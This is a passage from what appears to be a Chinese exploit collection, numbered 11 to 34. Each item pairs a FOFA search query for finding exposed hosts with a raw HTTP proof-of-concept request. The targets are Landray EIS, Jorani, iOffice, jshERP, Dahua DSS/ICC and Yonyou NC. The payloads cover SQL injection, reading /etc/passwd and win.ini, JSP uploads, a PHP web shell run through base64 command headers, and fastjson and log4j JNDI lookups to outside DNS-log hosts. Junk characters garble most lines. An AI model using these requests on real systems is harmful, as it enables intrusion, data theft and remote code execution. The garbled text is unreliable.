------WebKitFormBoundaryxdgaqmqu--
  E  R2 V4 u/ a5 _0 Y" w# m+ h! S. p
: o% r2 q% i$ t% J2 G9 P- k5 P6 C3 q8 b. A. O
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入" d$ x6 j9 U& Z$ p) [3 {. a
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
! Q6 U1 J- C' n$ M; s# RGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
. F/ {: Q) J" ]- i. x; F2 ?3 p- j+ R* HHost: 127.0.0.11 z* b5 }. k7 m0 q5 M( b
Pragma: no-cache
3 t4 a4 Z# K4 m" NCache-Control: no-cache: F8 ]+ v+ M/ j; N( G
Upgrade-Insecure-Requests: 19 V8 n. ?$ v, G' h7 `/ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 f! @( ?7 {3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% |% j/ ~2 B/ {: M' f+ o) u
Accept-Encoding: gzip, deflate( q4 ?3 z) V. J3 n, M
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* ^* U9 s( t. z3 K. rConnection: close
7 E& Q5 Q' q" \" k1 j5 |4 x' Y6 p6 |5 s
  ^' O' q- p% @) R! ~/ c0 q
12. Jorani < 1.0.2 远程命令执行6 y9 L) N, \, X$ G2 q" K' u/ [! C
FOFA:title="Jorani", Y/ {8 ^1 [0 i- N; {* Q: T: {; Y
第一步先拿到cookie: N% _1 S' ?0 n0 k
GET /session/login HTTP/1.1
7 F" T/ {6 A6 o7 l( A/ z1 cHost: 192.168.190.309 M/ G8 `" }! Z- K
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 }7 i9 W6 g4 X) {5 Z$ ]1 f
Connection: close
8 \& G5 j: y# M2 a6 O* h6 nAccept-Encoding: gzip
7 g4 \- a: q# g( Z7 z8 E. t  j$ X( I2 P+ z  Q/ Q4 n
: c4 H* [: k; m( v* m
响应中csrf_cookie_jorani用于后续请求
' v% X1 R( D2 r! r+ H, KHTTP/1.1 200 OK7 f  c2 h5 |, p7 j( {2 M
Connection: close
5 a$ e0 b, X0 U) Z* ?Cache-Control: no-store, no-cache, must-revalidate
6 V5 t. f" n  E! cContent-Type: text/html; charset=UTF-8+ R9 F8 x  l  r' l8 N  T
Date: Tue, 24 Oct 2023 09:34:28 GMT* h# I" `" u, G% }# ^
Expires: Thu, 19 Nov 1981 08:52:00 GMT6 |/ v+ _  _+ N. y% n
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT0 w/ V+ r6 ~! l8 t* t6 {* p
Pragma: no-cache
9 a# r& n* F- f7 Y$ a7 v; [! dServer: Apache/2.4.54 (Debian)
7 e" a0 S% j  k9 M2 xSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/0 V' v' }' H# _+ @6 V
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly& f7 J( C) s% R; \( R
Vary: Accept-Encoding
. u6 k5 I, D! o( P: M; m9 w+ R( o& q: b6 W

2 O- D1 w0 t; d; FPOST请求,执行函数并进行base64编码
7 |1 n: f, x- r" h+ Q# C/ uPOST /session/login HTTP/1.11 i9 G# y* m) Q. }' w
Host: 192.168.190.30: J; n# U% h# m* N3 a4 D) V. }$ D9 s2 o' M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36' M) T% G$ }! T
Connection: close
; h9 h5 ^" |5 e9 a0 S% R. GContent-Length: 252
% k7 x' r3 V6 E7 X8 T$ O7 b$ ZContent-Type: application/x-www-form-urlencoded
7 g. x$ w1 I& V8 [& QCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! K2 J2 K) S" @# v% `8 A, mAccept-Encoding: gzip  H/ f; G) J( j

9 K( j2 s, M: F# o( y6 B# Mcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor  H8 Z" P6 u/ B) x& p0 Z

% Z% G1 g- ~; h
; o. F) J; \6 m2 M
4 L. K; I* s1 r# |7 u向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串/ ^4 ?1 [1 }6 H6 L' A) I1 R
GET /pages/view/log-2023-10-24 HTTP/1.11 {$ N  H$ g" J
Host: 192.168.190.30
- f1 b0 k7 {' e3 O; {! uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! n# o4 w; @. j3 p) dConnection: close
1 b$ Y: B+ ]/ ^1 y0 l1 P/ K# [7 _Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; d$ w1 z2 G0 Y2 m8 K$ l) iK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: `$ p' K. }8 g: XX-REQUESTED-WITH: XMLHttpRequest7 y8 ?2 y$ B. X( M
Accept-Encoding: gzip+ L, |$ j5 {4 W( Y% z5 z

/ b5 b. p/ e3 w: t
1 b3 {7 ?7 J1 W8 h% C- S4 ~% V13. 红帆iOffice ioFileDown任意文件读取
/ ^4 i. n& K/ Q+ tFOFA:app="红帆-ioffice"
0 [4 f0 Z) O0 L( y/ T$ _1 Z5 PGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1* N, @4 y, Q) R4 {1 Y0 {: _
Host: x.x.x.x
6 x. ]( a6 F( d! A9 s' u7 C- kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 K2 Y/ r6 [! A3 _2 v5 d8 VConnection: close3 u9 w5 V) E% _& e$ c0 c6 \8 h; R
Accept: */*
4 z2 F: Y( C! X2 z: _5 r6 \" y' R0 NAccept-Encoding: gzip
  R4 W) D* v: @! ?7 n( A% W# f+ j* k

9 e6 L& k0 f  a* c+ S4 C14. 华夏ERP(jshERP)敏感信息泄露
; n: K: L* v( t+ k- BFOFA:body="jshERP-boot"+ U$ g# r% q) o' K0 E) h) V
泄露内容包括用户名密码" A$ H& r$ t8 N) c/ z' r. L
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
( D8 w) {; t/ s. B% p6 @4 Z& e( [Host: x.x.x.x
  b; c* l6 t8 J8 t: |, O; cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ o( t0 v6 |% O+ c4 L
Connection: close. C/ `2 m% V  Q! B# \+ S# }; S9 c5 Z0 `
Accept: */*, m9 q3 O( S( v/ I2 p/ n7 o
Accept-Language: en
! ]7 J, R2 T% J4 F: \# q& NAccept-Encoding: gzip
, m$ B; u/ @% q/ _* m: G
3 Y, F( M' y8 }% l
' n* r; h& D7 U( h15. 华夏ERP getAllList信息泄露2 ?5 |) [) N6 m+ _6 S* M8 _3 E6 I
CVE-2024-0490
2 U' h* B3 J+ d/ }1 `FOFA:body="jshERP-boot"
) i8 H  d2 {) C% D泄露内容包括用户名密码+ }# [  z- A( K6 U( n) p
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
2 W# ~# V( {- C1 JHost: 192.168.40.130:100( r6 ~; b& O7 k4 j7 \8 _$ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36& w$ k: h. Q2 r7 u/ W
Connection: close5 m; C7 c* C! f0 ^- p
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. F& U4 H! r8 Z3 i7 ?& iAccept-Language: en) F( E0 ?6 e0 W( E4 o$ \
sec-ch-ua-platform: Windows
. W0 }" h8 z1 P/ L0 n: `Accept-Encoding: gzip
  S+ \7 T$ H7 X" S) i/ V
4 ?+ e1 @; @8 ^% M/ y4 O
& f; @+ D1 g' ^/ y! Z8 w16.  红帆HFOffice医微云SQL注入( A( X  H8 c1 Q3 Z1 |, \3 t
FOFA:title="HFOffice"2 ~$ f  G, S8 K* m* I5 L: ~- x
poc中调用函数计算1234的md5值
2 c- U1 s5 i' S1 OGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) i' u3 s( J  p/ L' {Host: x.x.x.x; S2 g6 c% w2 K" N/ z: T; M% m  \0 [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* a! `6 ~5 i1 pConnection: close
. w6 p' ~% T) H/ g; A4 K/ L! e, {1 GAccept: */*5 ^$ L+ ~7 a; D' M' N5 ]9 M
Accept-Language: en- t# f8 }! m1 g- k9 k
Accept-Encoding: gzip
0 K6 K) m6 r5 c# @( _) }3 n/ o4 y1 Y+ ?* q, j
7 e2 ~7 ]& x9 t# a
17. 大华 DSS itcBulletin SQL 注入
2 T8 g( [# m# iFOFA:app="dahua-DSS"
' {4 L0 V$ j% DPOST /portal/services/itcBulletin?wsdl HTTP/1.10 ]6 u! @# k5 F; h! t
Host: x.x.x.x4 c. |' S" j$ n, T% E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  v- B. {7 V; a% V, V6 a( O8 o
Connection: close
6 M. }0 L) e$ Z: a% r! gContent-Length: 345
) Y6 O" l6 T* d* B& Q1 NAccept-Encoding: gzip
& `: d3 x* Q8 G! Z
( E. p% P% g) n, _# N* {( t( e9 i! X<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
# L) y' M' ]! j3 I* H, i: i) ?' |<s11:Body>4 o6 [2 W- p3 U- d5 A1 m3 Z
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>" [. I5 w* w( C/ `7 t* c1 c% p
      <netMarkings>
; j* f7 _% N# _! y! [       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( }* w4 ]& I. R. ?9 {0 l3 j      </netMarkings>, Z! E' C( ~) T) y8 `* Z( Y
    </ns1:deleteBulletin>4 ^8 W* y7 X: p" O
  </s11:Body>! a; x, E0 E2 }/ f& m6 n; n# C
</s11:Envelope>/ [* L8 r8 |3 y  y
% z  Q7 `1 r- G2 [$ _0 d3 [' H
- i! Y9 l' E7 x2 y+ {
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 R3 f4 F0 z# t+ s
FOFA:app="dahua-DSS"
5 p" y2 K- C: ?- mGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
7 b: m2 G1 J& m2 _Host: your-ip
6 K4 {9 }0 D6 ^1 v" YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 c! d. c9 p( f4 I2 K, NAccept-Encoding: gzip, deflate
/ r  r! e. Z/ b) cAccept: */*; [. D1 N# ?/ @  x/ C( L
Connection: keep-alive) l" r* y$ J8 T# R+ L# Y) d
5 @8 J9 t& _3 h1 @( k

' G& W% `' a& S1 K0 f" z: {. }, C3 W1 E  e$ G
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
, L8 d/ L. t3 _# z& x% E. X& RFOFA:app="dahua-DSS"
( }$ w- \0 S2 J; l  AGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
9 Z/ T, Q! S* T2 m  Q+ yHost:
2 C2 r, z, K$ S# AUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) F1 h% L" t. N# IAccept-Encoding: gzip, deflate
. w) o9 m+ @1 T; }0 k* ^' ~Accept: */*9 C  P2 T# K" S; N- p$ L7 s6 y
Connection: keep-alive' T& z) p1 b: ?- r* ?

) x/ N+ E0 d- y, _& [  _8 J4 d
+ @9 Q5 G. f6 Q7 d& Y1 F- x% W20. 大华ICC智能物联综合管理平台任意文件读取# H) q& M4 i# {
FOFA:body="*客户端会小于800*"
) H0 p: d" |7 @7 p! x) [GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 [' n2 ^% k, r; [6 f, ?2 S6 Z' |Host: x.x.x.x
' n% |9 ~! R  s+ xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, U3 @& d9 w" g4 CConnection: close  ]4 S6 P" n7 G) N, G. E$ x
Accept: */*: M2 L) }6 f: u% ^$ I8 s! E, C! Z
Accept-Language: en
& z# r1 D1 v) T3 V7 e+ _Accept-Encoding: gzip! Q1 t0 t* C" z6 l4 U6 A

% i& K. Z- h9 h3 I! B& F/ b
) ~3 ^$ }, g2 A# d/ c& j3 c$ J' n21. 大华ICC智能物联综合管理平台random远程代码执行) E( c2 |/ D: J7 v
FOFA:icon_hash="-1935899595"3 S4 X* s- H! L. K3 Q
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.10 Q0 \0 }' o5 H6 r3 _" {
Host: x.x.x.x
% r' A2 \" h8 L% y) g9 y5 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 J: S. R+ G4 N5 K: c5 _3 s1 X
Content-Length: 161
6 X7 M  f" _: p' {. RAccept-Encoding: gzip, t3 m% z; ~" ~6 \; ^. i
Connection: close
0 b. d% I0 @# o8 G3 r8 U! g7 F2 `Content-Type: application/json;charset=utf-8/ |0 c& ~+ f# V' r

3 \6 n/ g7 W5 A{& F6 e6 |  j9 d  ^7 U# d: D( I
"a":{* |: r8 A& r9 D% Z
   "@type":"com.alibaba.fastjson.JSONObject",
' r$ k7 ]' B" O: C5 @4 n/ k    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
0 N. X! \4 r+ c8 I& e6 ^3 G; R  }""
, P' W0 C$ w4 e}! j% R3 g0 }7 w; c' p, A7 o* t
  O8 y+ H8 l+ O* c" o  r& }- v
' v5 F/ A- y7 K- h" |* I1 k4 A
22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 @+ w, y* i+ t& A' I
FOFA:icon_hash="-1935899595"  h6 G: G. q0 N( N3 A5 w. E
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.10 l, B8 K+ F4 D2 {* O
Host: your-ip
) f: e4 p' X6 S* P& B: t' H- hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" a2 u4 y/ h( r8 gContent-Type: application/json;charset=utf-8. k2 N5 K9 L! l! W: z

1 m' h: C+ Q' |2 T: w{4 s+ r( }$ _# X4 F0 Z1 N* w( N
"loginName":"${jndi:ldap://dnslog}"4 T  Z9 G# n9 L5 P0 G/ s. K
}
. `9 N; u# q7 {: W/ M6 }+ j9 @* o9 p3 z* Z/ b- M0 y
# f# P- b' p$ O. T& M
- |* @: ]( U0 j. h
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* _2 q- R4 B# p8 o9 @
FOFA:icon_hash="-1935899595"
& U6 D5 ]( t' M! c0 v6 y) U  D( iPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ Y5 z7 ?# W! r0 |, U
Host: your-ip+ [7 |, i/ P$ }% Q8 m- ~' X  Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 e2 l, O$ c' s7 e; k, LContent-Type: application/json;charset=utf-86 I; }8 D6 X% W
Accept-Encoding: gzip. _  e4 {2 s: Z; @
Connection: close5 J0 w) E8 r4 B6 K/ e' I
0 {+ B, u* q7 o8 d" U
{) U( O/ i; _( B/ W, g
    "a":{2 t: u& m0 O" z! i# i  H
        "@type":"com.alibaba.fastjson.JSONObject",
8 P: m$ i3 p* ~& \* F* ]       {"@type":"java.net.URL","val":"http://DNSLOG"}
, P$ [+ H# D2 }" ]. ^) D        }""
& x8 F( ~2 b! j, v8 u, ]}
5 ^# s8 l& v( c1 V  h# S9 y) p! X7 ?& ^4 k
4 ^& }& ]! s& G1 S
24. 用友NC 6.5 accept.jsp任意文件上传
! u/ d8 O' {: ^5 m) {7 _2 \FOFA:icon_hash="1085941792"
- N* ?( L* ?) _! b0 t' o& NPOST /aim/equipmap/accept.jsp HTTP/1.1
8 A+ R/ _9 V6 W2 m' a/ HHost: x.x.x.x, j4 V9 E; C; }0 p
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
- e5 I6 v$ R' W, TConnection: close
, s* f( `9 d. @Content-Length: 449- R1 z8 h7 @+ |+ @
Accept: */*
5 k+ f6 j$ ~% A: E& {3 C4 Y  |Accept-Encoding: gzip
- X, o1 D% {) v) _Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc; Y& T' c; C! Q. ]! ~! a) o

4 m. E" x" ~. U1 s# d7 T-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. i, ]- t! v% ?6 m4 b/ ]
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"& j8 Q9 P# y0 y2 S
Content-Type: text/plain& p7 p  F1 e: X0 x' u" c5 Z$ \5 P
% ^, [: V( k% E2 X* U% j# _9 V
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& x1 o; ?8 C, Z9 y# C* }' u
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ U, ^* T) c. f; cContent-Disposition: form-data; name="fname"' T3 F6 O2 ?2 a* I& S* `" w
# |2 Y4 x5 F, L
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
. z, U- f3 |  A# K7 r% O-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
0 G: J2 C& [, A: @4 S( l( D  l3 h3 f( f$ n7 v0 s

/ c' W" S0 w- b5 c25. 用友NC registerServlet JNDI 远程代码执行/ k- r2 X( \7 q# i" d" ^
FOFA:app="用友-UFIDA-NC"
+ r1 R7 I. K, L8 D2 D) x6 U" gPOST /portal/registerServlet HTTP/1.1
- z1 T5 ?, n: k+ OHost: your-ip6 K, }2 ^8 u2 ]! d$ K; R  U% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- K5 f! Z- z' q8 h" X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
# s0 N9 [1 K: ?, D. N$ m( s! [) RAccept-Encoding: gzip, deflate  J$ R$ i2 z* L( S6 F4 R( D
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6+ Z. X, r, o/ Q* s* _1 @1 z. g
Content-Type: application/x-www-form-urlencoded* I7 k& V3 z! i* R- b" z/ ]) @" R& f5 A2 d
; n+ u; n6 b6 g( Z" `" l* J
type=1&dsname=ldap://dnslog5 D) O8 p' a1 H( T; T% ^* v4 S& \
. D: e8 g/ u4 h: n& ~# I

' K9 A1 s8 q7 _
1 j( a$ P% _7 }1 I2 W26. 用友NC linkVoucher SQL注入
' H0 v! N5 `2 L* G+ \FOFA:app="用友-UFIDA-NC"
5 a. R; q* y; M" d4 AGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.10 F0 M4 ]$ F/ V4 x
Host: your-ip' `8 @, z7 a+ Q9 D3 I9 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( Y# z8 I  g$ m/ v5 }, \
Content-Type: application/x-www-form-urlencoded/ m4 \: g3 @+ a5 z# q  u. _6 e
Accept-Encoding: gzip, deflate
0 O8 N6 M# t3 C3 K9 t+ tAccept: */*# g* {6 P8 ]  e$ e
Connection: keep-alive
4 a+ R- q) |/ U* f1 F' P8 S) `" w" O
# Y( _9 U1 g5 @
27. 用友 NC showcontent SQL注入: ]! R2 W4 u( Q" u) i$ q2 L  n
FOFA:icon_hash="1085941792"
1 u& w4 h# _6 `9 NGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
0 J" v5 d/ x3 L% cHost: your-ip
1 d, s5 U2 K- d0 \6 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ |3 V3 _+ y$ e1 [2 r. ]
Accept-Encoding: identity
% |4 }4 {6 J! F' mConnection: close/ @  [9 Q6 C* }, G% n1 `6 _% Y: R
Content-Type: text/xml; charset=utf-8$ d/ q# X/ G0 @0 u/ G6 Q$ r
3 ?( V, y/ X* m: I

- m9 T! K( T& @: T8 d9 Z28. 用友NC grouptemplet 任意文件上传
$ F5 d2 E" r( e' i& yFOFA:icon_hash="1085941792"4 j4 A" X  D  Q
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
* P6 i0 u" `0 e. ~! z, {4 bHost: x.x.x.x
6 V- o! I* W& z; H/ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.364 |; `2 J) X- S' n4 W* n) E' q
Connection: close
& }! t' n3 Y/ y; i+ oContent-Length: 2682 e3 E, Y# Q" x; i7 _5 t
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( t. D: P2 V; Q9 Z& E
Accept-Encoding: gzip5 t/ F8 g+ i! }0 j
4 C$ h0 @  ]* B7 K$ d- x! N
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 ^& D3 r7 T$ [) Z0 r! q# j) I
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"  a$ C, d$ o( O2 P5 C6 w
Content-Type: application/octet-stream
/ s4 D% A  ^& P- r) Z1 g* b0 p& A1 ^0 h6 E; ]3 M
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
" U$ D3 ~9 @" P7 ~. [------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
1 W/ M6 I4 O7 s" s& }! L
& F& i% P9 }' X7 Z- a6 G: ]$ r; a% f" v9 H# w
/uapim/static/pages/nc/head.jsp3 u+ }3 x( H  Q
8 r. T' \" [: e) K+ P) ~
29. 用友NC down/bill SQL注入
5 g* p4 v3 k2 TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 M3 T' y8 T# A, A; v8 n8 O
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: ]1 ?! u) ^) p& g4 O5 WHost: your-ip
+ s2 E2 t# ]2 l7 s' h6 k; c: n/ f  R- o4 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& Z9 k9 ^+ v/ O9 s0 i' C1 X
Content-Type: application/x-www-form-urlencoded/ k. T+ u1 U! q  T' S0 k
Accept-Encoding: gzip, deflate* b+ K+ _6 p& K# G6 X3 ~. y
Accept: */*1 k2 ^6 z5 P8 P( o, L
Connection: keep-alive
7 g7 ^' w: @" l4 y4 d( `( B$ }# v! ^, Y$ ~$ v/ N0 L. \# _# Z) t# J

" I, K' u& |* L- y; `30. 用友NC importPml SQL注入
& b' z2 J) N  E' t1 ~8 h$ }FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! k9 S  N+ k" s8 g$ f# wPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1  J, n6 S$ u- J
Host: your-ip1 i$ H# f. b( k  U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
1 r) ]) L6 Z4 ?4 A6 l( z3 g; UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* Z9 g# O* H8 `& ^
Connection: close: |# w" Z  \: `; Y: J. Z  `6 N
- f# U  r9 K' P/ [: \
------WebKitFormBoundaryH970hbttBhoCyj9V+ q1 K( C" `6 Q1 k
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
6 R& [, m* B9 H* IContent-Type: image/jpeg/ u4 B! X8 t3 @- ^
------WebKitFormBoundaryH970hbttBhoCyj9V--0 w( m7 l3 E. B3 t) t

; V" F+ S2 Q" c' G- ^
% E) ]& z! `, _! E( r1 t31. 用友NC runStateServlet SQL注入
9 `$ ~# @8 U* X, ?- _version<=6.5
* ], P# m) m2 _6 j+ F& ~FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"( V5 h9 N( g: n
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 X7 @4 P2 L6 ]% X, BHost: host& M* Z# i. Q. o  ], M* c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ `2 M5 h# A1 d) g4 g- C( K5 G' r9 ~- NContent-Type: application/x-www-form-urlencoded7 N( c; m, U6 s; A1 X) v; H# C

! {# o2 t6 @: ?+ @. X& K% u, a2 e* u. S; f
32. 用友NC complainbilldetail SQL注入1 B, f9 l$ |  X1 Z
version= NC633、NC65
9 l1 g8 f# W0 s4 M+ P! xFOFA:app="用友-UFIDA-NC"9 }0 p/ T& S4 D) K* S
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1: f4 H* d# e0 p" ~7 y
Host: your-ip
9 U' {* s# q7 ^# k+ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' C4 f6 Q. v  {3 ?8 r& t# D, U2 fContent-Type: application/x-www-form-urlencoded1 @9 @3 i) b' F% @
Accept-Encoding: gzip, deflate
3 I. Z" g: n* ?7 H! x- I. ?7 TAccept: */*; f- t, l" p/ k  N" J
Connection: keep-alive, [3 J( j4 Y2 H1 d9 E0 ?

& W! z5 P+ P* Q6 \% R* P
3 K3 i4 {! ^4 S9 x% l5 Q33. 用友NC downTax/download SQL注入
- y3 C* r* H9 e+ J* J2 O0 ^version:NC6.5FOFA:app="用友-UFIDA-NC"/ P/ N' K* f( T8 L' G
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ u+ T. j4 U% j/ k- `+ v2 A
Host: your-ip5 F8 [4 y0 I! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; d% K8 l; n$ v( ^! z, H  ~" l2 sContent-Type: application/x-www-form-urlencoded# A" h! v- W/ w! p" y
Accept-Encoding: gzip, deflate2 d& v7 D. i/ T
Accept: */*( U/ o% i/ }% O9 D% R2 A
Connection: keep-alive# w& V! [$ d9 M8 C
; @3 a  y' L, U1 e$ I; y! h1 ]4 f9 }

8 q& H+ z: O+ {& ^! L% y- S; h4 Z34. 用友NC warningDetailInfo接口SQL注入6 G( W0 T% c$ m0 I; y- g, }& K# k
FOFA:app="用友-UFIDA-NC"
/ D% s/ H  t. x$ k4 L. fGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1. `1 }5 c4 N' o  J
